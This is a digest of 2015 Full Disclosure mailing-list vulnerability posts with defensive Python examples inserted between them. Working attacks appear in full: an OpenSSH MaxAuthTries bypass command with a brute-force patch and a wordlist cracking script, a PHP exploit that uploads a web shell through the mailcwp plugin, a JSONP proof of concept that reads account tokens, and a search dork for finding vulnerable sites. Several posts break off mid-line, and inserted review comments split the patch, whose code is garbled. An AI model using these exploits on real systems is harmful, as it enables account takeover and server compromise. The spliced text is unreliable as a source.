[FD] FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability

2015-07-17 Thread Vulnerability Lab
Document Title:
===
FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1451

098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0


Release Date:
=
2015-07-15


Vulnerability Laboratory ID (VL-ID):

1451


Common Vulnerability Scoring System:

3.4


Product & Service Introduction:
===
Helping developers _add_ custom ecommerce without reinventing the wheel.

(Copy of the Homepage:  https://github.com/FoxyCart )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered a filter bypass 
issue and an application-side input validation vulnerability in the official 
FoxyCart web-application.


Vulnerability Disclosure Timeline:
==
2015-03-05: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2015-04-01: Vendor Notification (FoxyCart - Security Research Team)
2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team)
2015-06-30: Vendor Fix/Patch (FoxyCart - Developer Team)
2015-07-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

FoxyCart LLC
Product: FoxyCart - Web Application 2015 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent input validation mail encoding vulnerability has been discovered 
in the official FoxyCart company web-application.
The issue allows remote attackers to inject own malicious web context to the 
application-side of a vulnerable module or function.

The security vulnerability is located in the `comments` input field value of 
the `landing/white-glove-onboarding  Help Form` module. 
Remote attackers can exploit the issue to execute persistent malicious context 
in foxycart service mails.

The injection takes place in the help contact form POST method request with the 
vulnerable comments input value. The execution of the 
script code occurs on the application-side in the email body context. Attackers 
are able to inject iframes, img sources with onload alert 
or other script code tags. The service does not encode the input and has also 
no input restriction. 

After the code has been saved during the registration the internal service 
takes the wrong encoded dbms entries and streams them back in a 
notification mail to the registered users inbox. The attacker is also able to 
include random email addresses to stream mails with malicious 
persistent context to random targets for phishing, spam and co. The code does 
not execute in the profile values that introduces to the 
manufacturer itself but in the attached comments value that becomes visible in 
the copy mail.

The security risk of the persistent input validation web vulnerability in the 
mail encoding of the web-server is estimated as medium with a cvss 
(common vulnerability scoring system) count of 3.4. If the issue is existing in 
the main service values the other services can be affected by the 
issue too. Exploitation of the mail encoding and web-server validation 
vulnerability requires low or medium user interaction and no privileged 
customer application user account. Successful exploitation of the persistent 
mail encoding web vulnerability results in session hijacking, persistent 
phishing attacks, persistent redirects to external malicious source and 
persistent manipulation of affected or connected module context.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] landing/white-glove-onboarding  Help Form

Vulnerable Parameter(s):
[+] comments

Affected Module(s):
[+] We've received your email


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers without privileged application user account and with low or medium 
user interaction.
For security demonstration or to reproduce the security vulnerability follow 
the provided information and steps below to continue.

Manual steps to reproduce ...
1. Open the foxycart service
2. Surf to the vulnerable contact form url
3. Inject random value to the inputs and inject to the comments your script 
code payload
4. Save the entry
5. Redirect via Refresh Referer to confirm the contact request
6. Check inbox of the contact mail input
7. The code executes in the comments body section
8. Successful reproduction of the vulnerability!



--- PoC Session Logs [POST] (Inject) ---
13:33:03.031[1210ms][total 1210ms] Status: 302[Found]
POST 

[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability

2015-07-17 Thread Vulnerability Lab
Document Title:
===
UDID+ v2.5 iOS - Mail Command Inject Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1542


Release Date:
=
2015-07-06


Vulnerability Laboratory ID (VL-ID):

1542


Common Vulnerability Scoring System:

5.7


Product & Service Introduction:
===
UDID+ is a simple tool that displays the Unique Device Identifier (UDID) and 
other information of your iOS device. It works on iPod touches, 
iPhones and iPads allows you to either email the UDID to someone, or to copy 
it. The UDID is used by developers so they can add your device 
to their Ad Hoc distribution profiles. This allows them to create a special 
version of their apps that can be run on your device outside of 
the normal App Store distribution channels. Ad Hoc distribution is perfect for 
beta testing as well as for small in-house projects with a 
limited distribution group, of up to 100 devices.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/udid+/id385936840 )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered an application-side 
command inject web vulnerability in the official UDID+ v2.5 iOS mobile 
web-application.


Vulnerability Disclosure Timeline:
==
2015-07-06: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

EMonster Inc.
Product: UDID+ - iOS Mobile Web Application 2.5


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

A local command inject web vulnerability has been discovered in the official 
UDID+ v2.5 iOS mobile web-application.
The vulnerability allows to inject malicious script codes to the 
application-side of the vulnerable iOS mobile app.

The vulnerability is located in the device name value of the send by mail 
function. Local attackers are able to 
manipulate the name value of the device to compromise the mail function of the 
udid+ mobile app. The html encoding 
is broken in the send by mail export function. Local attackers are able to 
manipulate the device name id to compromise 
the application internal validation via send by email. The attack vector of the 
vulnerability is server-side and the 
injection point is the device name information settings.

The security risk of the local commandpath inject vulnerability is estimated as 
medium with a cvss (common vulnerability 
scoring system) count of 5.7. Exploitation of the commandpath inject 
vulnerability requires a low privilege androidios 
device account with restricted access and no user interaction. Successful 
exploitation of the vulnerability results in 
unauthorized execution of system specific commands and unauthorized path value 
requests to compromise the mobile iOS 
application and connected device components.

Vulnerable Module(s)
[+] Device - Settings - Information
 
Vulnerable Parameter(s)
[+] device cell name (cid)

Affected Module(s)
[+] UDID+ - Mail


Proof of Concept (PoC):
===
The application-side validation web vulnerability can be exploited by local 
attackers with low privilege or restricted device user account and without user 
interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

PoC: UDID+ Send Mail

<html><head><title>UDID+</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head><body>
<table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part1">
<tr><td><b>Betreff: </b>UDID+</td></tr><tr><td><b>Von: </b>Benjamin Mejri Kunz vulnerability...@icloud.com</td></tr>
<tr><td><b>Datum: </b>28.06.2015 20:49</td></tr></table><table border=0 cellspacing=0 cellpadding=0 width="100%" class="header-part2">
<tr><td><b>An: </b>aki b...@evolution-sec.com</td></tr></table><br>
<html><head><meta http-equiv="content-type" content="text/html; "></head><body dir="auto"><div>Here is my device information.<br><br>
<b>UDID:</b> C63FF684821B430C91F7F41D4D8A2F3A<br>
<b>Device Name:</b> bkm337 src=cid:%20./[LOCAL FILE INCLUDE VULNERABILITY VIA DEVICE CELL NAME VALUE!]
<b>System Name:</b> iPhone OS<br />
<b>System Version:</b> 8.3<br />
<b>Platform:</b> iPad 3G WiFi<br />
<b>Hardware Model:</b> P101AP<br />
<b>Processors:</b> 2<br />
<b>CPU Frequency:</b> 0 Hz<br />
<b>Bus Frequency:</b> 0 Hz<br />
<b>Physical Memory:</b> 1 GB<br />
<b>Non-Kernel Memory:</b> 809,21 MB<br />
<b>Model:</b> iPad<br />
<b>Localized Model:</b> iPad<br />
<b>Language:</b> de<br />
<b>Locale:</b> de_DE<br />
<b>Capacity:</b> 32 GB<br />
<b>Formatted:</b> 27,19 GB<br />
<b>Used:</b> 26,38 GB<br />
<b>Free:</b> 825,48 MB<br />
<b>Battery State:</b> Unplugged<br />
<b>Battery Level:</b> 65 %<br />
<b>Local IP:</b> 192.168.2.104<br />
<b>MAC 
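
Added here to illustrate the store-then-render flaw that both the FoxyCart and the UDID+ advisories describe (this is not either vendor's code): the unescaped renderer beside an escaped one, a check that reports tags the mail template never contained, and the multipart mail build. The templates and the sample field values are constructed.

```python
import html
import re
from email.message import EmailMessage

# Constructed samples of the untrusted fields named in the advisories: the
# help-form "comments" value and the iOS device name, each carrying markup.
SAMPLE_COMMENTS = 'Checkout is broken <img src="x" onload="alert(1)">'
SAMPLE_DEVICE_NAME = 'bkm337<img src="cid:%20./x">'

# Mail templates (assumed, not the vendors' own). Fields are filled at render
# time from whatever was stored in the database.
HELP_MAIL_TEMPLATE = ("<p>We've received your email.</p>"
                      "<p><b>Comments:</b> {comments}</p>")
DEVICE_MAIL_TEMPLATE = "<b>Device Name:</b> {device_name}<br />"

TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)")


def render_unsafe(template, **fields):
    """The pattern both advisories describe: stored values are dropped into
    the HTML mail body as-is, so any tag in them reaches the recipient's
    mail client as live markup."""
    return template.format(**fields)


def render_safe(template, **fields):
    """Hardened form: escape every untrusted value at the point it enters
    HTML, whatever was (or was not) done when it was stored."""
    return template.format(**{k: html.escape(v, quote=True)
                              for k, v in fields.items()})


def foreign_tags(template, rendered):
    """Names of tags present in the rendered body that the template itself
    never contained; a non-empty result means injected markup survived."""
    allowed = {t.lower() for t in TAG_RE.findall(template)}
    return sorted({t.lower() for t in TAG_RE.findall(rendered)} - allowed)


def build_notification(to_addr, text_body, html_body):
    """multipart/alternative mail with the plain-text part first; the HTML
    alternative is expected to come from render_safe(). The recipient is
    also user-supplied in the FoxyCart flow, so the caller should confirm
    the address before any further mail is sent to it."""
    msg = EmailMessage()
    msg["To"] = to_addr
    msg["Subject"] = "We've received your email"
    msg.set_content(text_body)
    msg.add_alternative(html_body, subtype="html")
    return msg
```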

[FD] AirDroid ID - Client Side JSONP Callback Vulnerability

2015-07-17 Thread Vulnerability Lab
Document Title:
===
AirDroid ID - Client Side JSONP Callback Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1544


Release Date:
=
2015-07-10


Vulnerability Laboratory ID (VL-ID):

1544


Common Vulnerability Scoring System:

5.6


Product & Service Introduction:
===
Calls, SMS, and the app notifications you allowed, mirrored to the large 
computer screen you are focusing on. Type with full physical keyboard and 
control with mouse. Transfer things faster without looking for a cable. Better 
equipments, better life. AirMirror, a brand new way of interacting between 
PC/Mac and your Android. Your Android, right on your computer, right now. With 
the new Desktop client, your Android, Windows and Mac work like one.

(Copy of the Vendor Homepage: https://www.airdroid.com/en/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a client-side 
vulnerability in the official AirDroid ID login online-service web-application.


Vulnerability Disclosure Timeline:
==
2015-07-06: Researcher Notification & Coordination (Hadji Samir)
2015-07-07: Vendor Notification (Android Security Team)
2015-07-09: Vendor Response/Feedback (Android Security Team)
2015-07-10: Vendor Fix/Patch (Android Developer Team)
2015-07-10: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Sand Studio
Product: Airdroid - Online Service (Web-Application) 2015 Q2


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A client-side jsonp callback vulnerability has been discovered in the official 
Airdroid online-service web-application.
The vulnerability allows remote attackers to manipulate client-side application 
to browser requests to compromise session data.

The vulnerability is located in the callback parameter value of the vulnerable 
signIn.html file. The vulnerability allows remote 
attackers to inject script code by client-side manipulated GET method requests. 
The vulnerability allows remote attackers to call 
a JSONP callback to get the information about the user.

The vulnerability allows remote attackers to callback script code by 
client-side manipulated GET method requests. This can result in an id 
account or device compromise. The attack vector of the vulnerability is located 
on the client-side and the request method to inject/execute 
is GET. The service replies via jsonp by a callback with wrong cleanup which 
results in the unexpected behaviour. 

The security risk of the client-side web vulnerability is estimated as medium 
with a cvss (common vulnerability scoring system) count of 5.6. 
Exploitation of the cross site scripting web vulnerability requires no 
privilege web application user account and low user interaction (click). 
Successful exploitation results in client-side account theft by hijacking, 
client-side phishing, client-side external redirects and non-persistent 
manipulation of affected or connected service modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Login [Web] 
(./p14/user/)

Vulnerable File(s):
[+] signIn.html

Vulnerable Parameter(s):
[+] callback


Proof of Concept (PoC):
===
The client-side callback vulnerability can be exploited by remote attackers 
without privilege application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

PoC: *.html
<html>
 <head>
 <script>
 samir = function(data) {
 alert("Name " + data.result.nickname + " mail " + data.result.mail + " id " +
 data.result.id + " token " + data.result.pc_push_token);
 }
 </script>
 </head>
 <body>
 <h1>JSONP Call</h1>
 <script src="https://id.airdroid.com/p14/user/signIn.html?callback=samir"></script>
 </body>
 </html>

Vulnerable Source: JSONP Call
samir({"code":1,"result":{"id":9731220,"nickname":"Hadji+Samir","mail":"info.dima...@gmail.com","create_date":"2015-07-06 06:18:40","data_flow_total":0,"vip":0,"vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":1,"mail_verify":0,"avatar_url":"","last_update_avatar":"2015-07-06 06:18:40","country":"DZ","isPremium":-1,"is_recurring":0,"has_device":1,"device":[{"id":10257826,"name":"htc HTC 
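
Added example, not AirDroid's code: the JSONP pattern from the PoC above beside a hardened handler. The session store, origins and URLs are constructed placeholders. The point is that data bound to a cookie session must never be wrapped in a caller-named callback, and that where JSONP remains for genuinely public data the callback name must be constrained.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed session store standing in for the account record shown under
# "Vulnerable Source" above (placeholders, not real ids or addresses).
SESSIONS = {"sid-123": {"id": 1, "nickname": "user", "mail": "user@example.com",
                        "pc_push_token": "TOKEN-PLACEHOLDER"}}
ALLOWED_ORIGINS = {"https://web.example.com"}   # assumed CORS allow-list
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$.]*$")
JSON_HDR = {"Content-Type": "application/json", "X-Content-Type-Options": "nosniff"}


def _callback(url, default=""):
    return parse_qs(urlsplit(url).query).get("callback", [default])[0]


def signin_vulnerable(url, cookie_sid, origin):
    """The pattern in the advisory: any site may load the endpoint with
    <script src="...?callback=NAME">; the browser attaches the victim's
    cookie and the account record is handed to the attacker's function.
    The origin argument is accepted but ignored, which is the defect."""
    user = SESSIONS.get(cookie_sid)
    payload = {"code": 1, "result": user} if user else {"code": 0}
    body = f"{_callback(url, 'callback')}({json.dumps(payload)})"
    return 200, {"Content-Type": "application/javascript"}, body


def signin_hardened(url, cookie_sid, origin):
    """Hardened: session-bound data is plain JSON, never script. A cross-site
    <script src> load sends no Origin and gets the bare JSON object, which
    it cannot read and which nosniff stops being reinterpreted; cross-site
    readers must be allow-listed Origins using CORS with credentials."""
    user = SESSIONS.get(cookie_sid)
    if user is None:
        return 401, dict(JSON_HDR), json.dumps({"code": 0})
    body = json.dumps({"code": 1, "result": user})
    if origin is None:            # same-origin request: no CORS headers needed
        return 200, dict(JSON_HDR), body
    if origin not in ALLOWED_ORIGINS:
        return 403, dict(JSON_HDR), json.dumps({"code": 0, "error": "origin not allowed"})
    headers = dict(JSON_HDR, **{"Access-Control-Allow-Origin": origin,
                                "Access-Control-Allow-Credentials": "true",
                                "Vary": "Origin"})
    return 200, headers, body


def jsonp_public(url, data):
    """Where JSONP must stay for data that is public and not tied to a
    session: constrain the callback to a bare identifier so the response
    cannot carry attacker-chosen script, and mark it nosniff."""
    cb = _callback(url)
    if not CALLBACK_RE.match(cb):
        return 400, dict(JSON_HDR), json.dumps({"error": "bad callback"})
    hdr = {"Content-Type": "application/javascript", "X-Content-Type-Options": "nosniff"}
    return 200, hdr, f"/**/{cb}({json.dumps(data)});"
```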

[FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability

2015-07-17 Thread Douglas Held
Benjamin,

What is an androidios device account? Is that a typo? And does the default 
mobile/alpine user account suffice?

It isn't clear to me whether the iOS device needs to be jailbroken for this 
exploit to work. The 

--
Douglas Held
d...@douglasheld.net via dough...@gmail.com
Note: Sent from a device that occasionally respells and replaces words

 On 17 Jul 2015, at 10:08, fulldisclosure-requ...@seclists.org wrote:
 
 
 Message: 8
 Date: Fri, 17 Jul 2015 15:04:22 +0200
 From: Vulnerability Lab resea...@vulnerability-lab.com
 To: fulldisclosure@seclists.org
 Subject: [FD] UDID+ v2.5 iOS - Mail Command Inject Vulnerability
 Message-ID: 55a8fd56.1060...@vulnerability-lab.com
 Content-Type: text/plain; charset=utf-8
 

[FD] OpenSSH keyboard-interactive authentication brute force vulnerability (MaxAuthTries bypass)

2015-07-17 Thread king cope
OpenSSH has a default value of six authentication tries before it will
close the connection (the ssh client allows only three password
entries per default).

With this vulnerability an attacker is able to request as many
password prompts limited by the “login grace time” setting, that is
set to two minutes by default.

Especially FreeBSD systems are affected by the vulnerability because
they have keyboard-interactive authentication enabled by default.

A simple way to exploit the bug is to execute this command:

ssh -lusername -oKbdInteractiveDevices=`perl -e 'print "pam," x 1'` targethost

This will effectively allow up to 1 password entries limited by
the login grace time setting.

The crucial part is that if the attacker requests 1
keyboard-interactive devices openssh will gracefully execute the
request and will be inside a loop to accept passwords until the
specified devices are exceeded.

Here is a patch for openssh-6.9p1 that will allow to use a wordlist
and any passwords piped to the ssh process to be used in order to
crack passwords remotely.

---snip---

diff openssh-6.9p1/sshconnect2.c openssh-6.9p1-modified/sshconnect2.c
 83a84,85
  char password[1024];
 
 510c512,517
  authctxt-success = 1; /* break out */
 ---
  printf(==\n);
  printf(*** SUCCESS **\n);
  printf(*** PASSWORD: %s\n, password);
  printf(==\n);
  exit(0);
 
 1376a1384,1385
  char *devicebuffer;
  int i;
 1386a1396,1405
  devicebuffer = calloc(1, 20);
  if (!devicebuffer) {
  fatal(cannot allocate devicebuffer);
  }
 
  for (i=0;i20-2;i+=2) {
  memcpy(devicebuffer + i, p,, 2);
  }
  devicebuffer[20] = 0;
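Review bot: `devicebuffer[20] = 0;` stores one byte past the `calloc(1, 20)` allocation (valid indexes are 0..19), an off-by-one heap write. The fill loop stops two bytes short of the size and calloc already zero-fills the buffer, so the terminator store is redundant; drop it, or allocate size + 1 and terminate at index size. The same size literal is repeated three times in this hunk; a single `#define` would keep them consistent.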
 
 1393,1394c1412
  packet_put_cstring(options.kbd_interactive_devices ?
  options.kbd_interactive_devices : );
 ---
  packet_put_cstring(devicebuffer);
 1408c1426
  char *name, *inst, *lang, *prompt, *response;
 ---
  char *name, *inst, *lang, *prompt;
 1410c1428
  int echo = 0;
 ---
  char *pos;
 1425a1444
 
 1430a1450
 
 1443,1449c1463,1469
  echo = packet_get_char();
 
  response = read_passphrase(prompt, echo ? RP_ECHO : 0);
 
  packet_put_cstring(response);
  explicit_bzero(response, strlen(response));
  free(response);
 ---
  packet_get_char();
  if (fgets(password, 1024, stdin) == NULL)
  exit(0);
  if ((pos=strchr(password, '\n')) != NULL)
  *pos = '';
  printf(%s\n, password);
  packet_put_cstring(password);
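Review bot: `*pos = '';` on the newline-stripping line is an empty character constant, which C does not accept, so this hunk will not compile as posted; the intended terminator is `'\0'`. The replaced branch also no longer zeroes or frees anything on the way out, so the cleared `explicit_bzero`/`free` pair from the removed lines has no counterpart for the global `password` buffer.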

---snip---

After applying the patch you can use this shell script to make the
password attack from a wordlist:

---snip---

#!/bin/bash
# run as:
# cat wordlist.txt | ./sshcracker.sh ssh-username ssh-target
#
while true
do
./ssh -l$1 $2
rc=$?; if [[ $rc == 0 ]]; then exit $rc; fi
echo Respawn due to login grace time...
done

---snip---

For example enter this command:

cat wordlist.txt | ./sshcracker.sh test 192.168.2.173

The attack has been tested against a new FreeBSD 10.1 system and older
FreeBSD versions such as version 6.2.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
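
Added example (not from the post or from OpenSSH): detection logic for the behaviour described above, run over a constructed sshd auth log, plus an sshd_config check for the settings that bound it. It assumes that each rejected keyboard-interactive prompt produces one "Failed keyboard-interactive/pam ... ssh2" line and that all prompts of one connection share the source port.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd auth-log excerpt (not from the post). The first eight lines
# come from ONE connection (same source port) within 40 seconds; a server that
# honours MaxAuthTries 6 would have dropped it after the sixth failure.
SAMPLE_LOG = """\
Jul 17 15:04:22 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:04:25 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:04:29 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:04:33 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:04:38 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:04:44 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:04:50 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:05:02 host sshd[1021]: Failed keyboard-interactive/pam for invalid user test from 192.0.2.10 port 51234 ssh2
Jul 17 15:05:10 host sshd[1030]: Failed password for admin from 192.0.2.77 port 40022 ssh2
Jul 17 15:05:16 host sshd[1030]: Failed password for admin from 192.0.2.77 port 40022 ssh2
"""
FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed "
    r"(?P<method>\S+) for (?:invalid user )?(?P<user>\S+) from "
    r"(?P<ip>\S+) port (?P<port>\d+) ssh2")

def parse_failures(log_text, year=2015):
    """(timestamp, method, ip, port) for each sshd authentication failure."""
    out = []
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            out.append((ts, m["method"], m["ip"], int(m["port"])))
    return out

def find_maxauthtries_bypass(log_text, max_auth_tries=6, login_grace=120):
    """Alert on any single connection (ip, port pair) that accumulated more
    failures than MaxAuthTries inside one LoginGraceTime window."""
    per_conn = defaultdict(list)
    for ts, method, ip, port in parse_failures(log_text):
        per_conn[(ip, port)].append((ts, method))
    alerts = []
    for (ip, port), events in per_conn.items():
        events.sort()
        span = (events[-1][0] - events[0][0]).total_seconds()
        if len(events) > max_auth_tries and span <= login_grace:
            alerts.append({"ip": ip, "port": port, "failures": len(events),
                           "seconds": span,
                           "methods": sorted({m for _, m in events})})
    return alerts

def _seconds(value):
    """sshd_config time value: plain seconds or with an s/m/h suffix."""
    units = {"s": 1, "m": 60, "h": 3600}
    if value and value[-1] in units:
        return int(value[:-1]) * units[value[-1]]
    return int(value)

def audit_sshd_config(config_text):
    """Findings for the settings that bound this bug on an unpatched 6.x
    server (assumed defaults when absent: ChallengeResponseAuthentication
    yes, LoginGraceTime 120, MaxAuthTries 6). An empty list is good."""
    opts = {}
    for line in config_text.splitlines():
        parts = line.split("#", 1)[0].split(None, 1)
        if parts:
            opts[parts[0].lower()] = parts[1].strip().lower() if len(parts) > 1 else ""
    findings = []
    if opts.get("challengeresponseauthentication", "yes") != "no":
        findings.append("ChallengeResponseAuthentication is not 'no': the "
                        "keyboard-interactive/PAM path this bug uses is open")
    grace = _seconds(opts.get("logingracetime", "120"))
    if grace > 60:
        findings.append(f"LoginGraceTime {grace}s: long window per connection")
    if int(opts.get("maxauthtries", "6")) > 6:
        findings.append("MaxAuthTries above the default of 6")
    return findings
```

Disabling keyboard-interactive is only an option where password logins do not depend on PAM; otherwise the config check simply documents the exposure until the server is patched.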

[FD] 1503A - Chrome - ui::AXTree::Unserialize use-after-free

2015-07-17 Thread Berend-Jan Wever
*TL;DR*
After 60 day deadline has passed, I am releasing details on an unfixed
use-after-free vulnerability in Chrome's accessibility features, which are
disabled by default. The issue does not look exploitable.

*More details*
http://berendjanwever.blogspot.nl/2015/07/1503a-chrome-uiaxtreeunserialize-use.html


*Chromium bug* https://code.google.com/p/chromium/issues/detail?id=479743

Cheers,

SkyLined




Re: [FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

2015-07-17 Thread Larry W. Cashdollar

 On Jul 16, 2015, at 8:18 PM, Larry W. Cashdollar lar...@me.com wrote:
 
 Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
 Author: Larry W. Cashdollar, @_larry0
 Date: 2015-07-09
 Download Site: https://wordpress.org/plugins/mailcwp/
 Vendor: CadreWorks Pty Ltd
 Vendor Notified: 2015-07-09 fixed in v1.110

Typo should be v1.100.





[FD] Remote file upload vulnerability in mailcwp v1.99 wordpress plugin

2015-07-17 Thread Larry W. Cashdollar
Title: Remote file upload vulnerability in mailcwp v1.99 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-09
Download Site: https://wordpress.org/plugins/mailcwp/
Vendor: CadreWorks Pty Ltd
Vendor Notified: 2015-07-09 fixed in v1.110
Vendor Contact: Contact Page via WP site
Description: MailCWP, Mail Client for WordPress. A full-featured mail client 
plugin providing webmail access through your WordPress blog or website.
Vulnerability:
The code in mailcwp-upload.php doesn't check that a user is authenticated or 
what type of file is being uploaded, so any user can upload a shell to the target 
wordpress server:

$message_id = $_REQUEST["message_id"];
$upload_dir = $_REQUEST["upload_dir"];
...
$fileName = $_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Exploitation requires the attacker to guess a writeable location in the http 
server root.

CVEID:
OSVDB:
Exploit Code:
<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
$target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
$file_name_with_full_path = '/var/www/shell.php';

echo "POST to $target_url $file_name_with_full_path";
$post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
Advisory: http://www.vapid.dhs.org/advisory.php?v=138
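
Added example, neither the plugin's code nor a patch for it: the upload-path decision the vulnerable handler gets wrong, written as a Python function so the checks are easy to read. The upload root and the extension allow-list are assumptions; the `upload_dir` value in the test is the one from the exploit URL above.

```python
import posixpath
import re

# Assumed server-side policy (not the plugin's own): the only directory
# attachments may be written to, and the extensions accepted for them.
UPLOAD_ROOT = "/var/www/wp-content/uploads/mailcwp"
ALLOWED_EXT = {"txt", "pdf", "png", "jpg", "jpeg", "gif", "zip"}
SAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


class UploadRejected(Exception):
    pass


def upload_target(request, is_authenticated, upload_root=UPLOAD_ROOT):
    """Return the path an attachment may be stored at, or raise.

    The vulnerable handler trusted three attacker-controlled values
    (upload_dir, message_id and the client file name) and never checked
    that a user was logged in. Here: login is required, upload_dir from the
    request is ignored, message_id must be numeric, the client name is
    reduced to a sanitised basename with exactly one allow-listed extension,
    and the final path must still lie under upload_root."""
    if not is_authenticated:
        raise UploadRejected("authentication required")
    message_id = str(request.get("message_id", ""))
    if not message_id.isdigit():
        raise UploadRejected("message_id must be numeric")
    # Drop any directory part the client supplied (../, /, \), then replace
    # everything outside a conservative character set.
    name = re.split(r"[\\/]", str(request.get("name", "")))[-1]
    name = SAFE_CHARS.sub("_", name).strip(".")
    parts = name.split(".")
    # One extension only: a name like shell.php.png is run as PHP by Apache
    # setups that map handlers with AddHandler, so refuse multi-extension names.
    if len(parts) != 2 or not parts[0] or parts[1].lower() not in ALLOWED_EXT:
        raise UploadRejected(f"file name not allowed: {name!r}")
    target = posixpath.normpath(posixpath.join(upload_root, f"{message_id}-{name}"))
    if posixpath.commonpath([upload_root, target]) != upload_root:
        raise UploadRejected("path escapes upload root")
    return target


def rejection_reason(request, is_authenticated):
    """None if the request would be accepted, else the rejection message."""
    try:
        upload_target(request, is_authenticated)
    except UploadRejected as exc:
        return str(exc)
    return None
```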


[FD] weblogin software cross site request

2015-07-17 Thread Juan Martinez
Hi people, I discovered a cross site request in this
Dork: intitle:weblogin intext:This page will redirect you to:

This cross site request is exploited like this example:
http://target/Login:%20Weblogin%20%20This%20page%20will%20redirect%20you%20to%20
Inject any word you want to show in the webpage. Or another PoC is, for
example:
http:target?referer=inject the word or number you want to see in the
page.
I advise fixing this bug because it is very easy to deface these webpages with
Product: WebLogin
Best Regards.
Rootktit Pentester.
